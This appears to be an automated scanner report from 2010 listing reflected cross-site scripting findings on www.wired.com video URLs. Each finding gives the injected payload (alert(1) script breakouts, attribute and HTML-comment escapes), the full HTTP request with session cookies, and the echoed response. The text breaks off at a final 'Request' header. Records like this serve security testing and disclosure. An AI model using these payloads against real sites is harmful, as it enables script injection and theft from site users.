GET /video3e1b1"><a>72a1202a501/harry-potter-and-the-halfblood-prince/14545305001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29428 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:58:09 GMT Date: Mon, 22 Nov 2010 00:53:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video3e1b1"><a>72a1202a501 ss_harry-potter-and-the-halfblood-prince c_14545305001"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c34c3"-alert(1)-"ee085e60c1e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/harry-potter-and-the-halfblood-princec34c3"-alert(1)-"ee085e60c1e/14545305001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=271 Expires: Mon, 22 Nov 2010 00:59:42 GMT Date: Mon, 22 Nov 2010 00:55:11 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106757
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84e8e"><a>bee2d49739b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/harry-potter-and-the-halfblood-prince84e8e"><a>bee2d49739b/14545305001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:59:17 GMT Date: Mon, 22 Nov 2010 00:54:17 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106758
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_harry-potter-and-the-halfblood-prince84e8e"><a>bee2d49739b c_14545305001"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa393"-alert(1)-"0c94552f5e1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/harry-potter-and-the-halfblood-prince/14545305001aa393"-alert(1)-"0c94552f5e1 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 01:01:21 GMT Date: Mon, 22 Nov 2010 00:56:21 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106775
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9dbca"><a>251f69d7bf9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/harry-potter-and-the-halfblood-prince/145453050019dbca"><a>251f69d7bf9 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 01:00:12 GMT Date: Mon, 22 Nov 2010 00:55:12 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106758
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_harry-potter-and-the-halfblood-prince c_145453050019dbca"><a>251f69d7bf9"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b00f1"><a>b64741599e3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /videob00f1"><a>b64741599e3/howto HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29338 Vary: Accept-Encoding Cache-Control: max-age=292 Expires: Mon, 22 Nov 2010 00:53:18 GMT Date: Mon, 22 Nov 2010 00:48:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_videob00f1"><a>b64741599e3 ss_howto"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69008"><a>c07367fd69a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/howto69008"><a>c07367fd69a HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=288 Expires: Mon, 22 Nov 2010 00:55:46 GMT Date: Mon, 22 Nov 2010 00:50:58 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106666
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_howto69008"><a>c07367fd69a"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed5a0"-alert(1)-"5b13b736c77 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/howtoed5a0"-alert(1)-"5b13b736c77 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:57:06 GMT Date: Mon, 22 Nov 2010 00:52:06 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106619
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f8e8"><a>35211efdab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video5f8e8"><a>35211efdab/institute-for-business--home-safety/619269818001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29424 Vary: Accept-Encoding Cache-Control: max-age=289 Expires: Mon, 22 Nov 2010 00:55:38 GMT Date: Mon, 22 Nov 2010 00:50:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video5f8e8"><a>35211efdab ss_institute-for-business--home-safety c_619269818001"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload a4846--><script>alert(1)</script>6c3251ea1d1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /videoa4846--><script>alert(1)</script>6c3251ea1d1/institute-for-business--home-safety/619269818001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29459 Vary: Accept-Encoding Cache-Control: max-age=275 Expires: Mon, 22 Nov 2010 00:56:12 GMT Date: Mon, 22 Nov 2010 00:51:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /videoa4846--><script>alert(1)</script>6c3251ea1d1/institute-for-business--home-safety/619269818001 --> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 489b5"><a>0e6e46c2951 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/institute-for-business--home-safety489b5"><a>0e6e46c2951/619269818001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:56:38 GMT Date: Mon, 22 Nov 2010 00:51:38 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106695
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_institute-for-business--home-safety489b5"><a>0e6e46c2951 c_619269818001"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a92e5"-alert(1)-"76a44198558 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/institute-for-business--home-safetya92e5"-alert(1)-"76a44198558/619269818001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:57:44 GMT Date: Mon, 22 Nov 2010 00:52:44 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106770
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0885"><a>cdadafd2898 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/institute-for-business--home-safety/619269818001a0885"><a>cdadafd2898 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:57:47 GMT Date: Mon, 22 Nov 2010 00:52:47 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106759
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_institute-for-business--home-safety c_619269818001a0885"><a>cdadafd2898"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2bc23"-alert(1)-"45d1e9311d0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/institute-for-business--home-safety/6192698180012bc23"-alert(1)-"45d1e9311d0 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=290 Expires: Mon, 22 Nov 2010 00:58:53 GMT Date: Mon, 22 Nov 2010 00:54:03 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106709
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f635"><a>1709f4fc8f0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video8f635"><a>1709f4fc8f0/interviews HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29348 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:53:15 GMT Date: Mon, 22 Nov 2010 00:48:15 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video8f635"><a>1709f4fc8f0 ss_interviews"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89c63"-alert(1)-"73f900c21ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/interviews89c63"-alert(1)-"73f900c21ca HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=286 Expires: Mon, 22 Nov 2010 00:56:15 GMT Date: Mon, 22 Nov 2010 00:51:29 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106690
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2cd1"><a>9854118d6a7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/interviewsb2cd1"><a>9854118d6a7 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:55:14 GMT Date: Mon, 22 Nov 2010 00:50:14 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106679
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_interviewsb2cd1"><a>9854118d6a7"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload f8c52--><script>alert(1)</script>16b9361acca was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
